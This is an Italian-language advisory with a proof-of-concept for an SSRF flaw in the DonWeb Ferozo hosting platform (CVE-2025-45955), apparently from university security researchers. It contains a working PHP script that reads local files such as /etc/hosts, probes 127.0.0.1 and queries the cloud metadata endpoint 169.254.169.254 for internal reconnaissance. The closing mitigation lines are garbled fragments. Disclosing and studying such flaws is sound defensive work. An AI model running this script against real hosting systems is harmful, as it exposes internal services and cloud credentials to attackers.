
Exploit proof-of-concept per CVE-2025-45955 che dimostra Server-Side Request Forgery (SSRF) nella piattaforma di hosting DonWeb Ferozo, consentendo la mappatura dell'infrastruttura interna e l'enumerazione dei metadati cloud.
Un attaccante può sfruttare questa vulnerabilità caricando ed eseguendo un file PHP appositamente predisposto sulla piattaforma di hosting Ferozo. Una volta accessibile, il file lancia una serie di tentativi SSRF verso servizi interni (come 127.0.0.1, 169.254.169.254 o endpoint del service mesh), file locali (ad esempio file:///etc/passwd) ed endpoint noti di metadata cloud. Lo script raccoglie risposte o messaggi di errore, consentendo all'attaccante di mappare l'infrastruttura interna, enumerare i servizi accessibili e raccogliere informazioni sensibili per ulteriori attacchi.
Il codice seguente dimostra la vulnerabilità:
<?php
$targets = [
"file:///etc/hosts",
"file:///etc/resolv.conf",
"http://127.0.0.1/",
"http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
echo "[*] Trying: $url\n";
$res = @file_get_contents($url);
echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>
file_get_contents, fopen, ecc.)127.0.0.0/8, 169.254.169.254, ecc.) tramite regole firewall in uscitaCVE-2025-45955
Segnalato da [Facundo Fernandez, Jinook Kim, Surendra Puppala / Security Researchers | @BYU]*